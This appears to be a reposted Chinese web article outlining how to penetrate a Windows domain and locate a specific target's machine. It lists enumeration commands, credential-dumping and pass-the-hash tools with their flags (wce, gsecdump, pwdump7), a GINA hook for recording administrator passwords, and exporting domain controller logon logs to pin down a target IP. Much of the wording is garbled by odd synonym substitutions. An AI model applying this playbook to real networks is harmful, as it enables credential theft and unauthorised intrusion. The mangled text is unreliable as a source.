|
|
|
联系客服020-83701501

域内特定目标渗透方法概要

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
域内特定方针渗透方法大纲

如许导出日志解析的,或许疾速定位方针,而且产生的日志比较小,根本不消思忖日志题目。在昔日跟anubis_zcl的寻找中还相熟到一些新的东西。明天再补充。

一、获取域内动态

1、列出该域内部门凝滞名(dsquery computer domainroot -limit 65535 && net group “domain computers” /domain)

2、列出该域内部门用户名(dsquery user domainroot -limit 65535 && net user /domain)

3、列出该域内网段分袂 (dsquery subnet)

4、列出该域内分组 (dsquery group && net group /domain)

5、列出该域内结构单位 (dsquery ou)

6、列出该域内域控制器 (dsquery server && net time /domain)

7、列出域治理员帐号 (net group “domain admins” /domain)

二、解析域内动态必定方针

颠末上述搜集到的动态,咱们或许解析出许多紧张动态比如:每个分组上面都有哪些用户、凝滞(net group 组名 /domain && dsquery

“ou动态”)文件效劳器,邮件效劳器以及方针地址地位等。

三、域内渗透

1、抓取hash破解暗码(gsecdump、wce、pwdump7、gethash等)

2、hash 注入 (wce -s)

3、读取lsa明文暗码 (wce1.3 -w 、 gsecdump -a)

4、0day溢出(smb、rdp、dns、rpc 等)

5、放置gina 纪录治理员帐号暗码

6、hd 扫描弱口令等

颠末以上方法获取域控制器权限

四、必定方针IP

1、必定方针用户登录日期 (net user aa /domain)

2、导出该日期域控制器登录日志 (cscript eventquery.vbs /fi “Datetime eq 06/25/2012,03:15:00AM/06/25/2012,03:15:00PM”

/l Security >c:\xxx.txt)

3、导出DHCP设置装备摆设(netsh dhcp)

颠末日志解析可必定方针IP,进一步粗略攻击。

本文转自bugcx作者anubis_zcl由Internet安然攻防研究室(www.91ri.org)动态安然小组搜集整理。

谢罪:因前几天列入省级的一项比赛 锤炼告急 就没若干好多岁月来更新站点 前天比完累坏了 今日劳动了一天昔日刚起来就来更新了 少更新了几篇文章 自己包容。

数安新闻+更多

证书相关+更多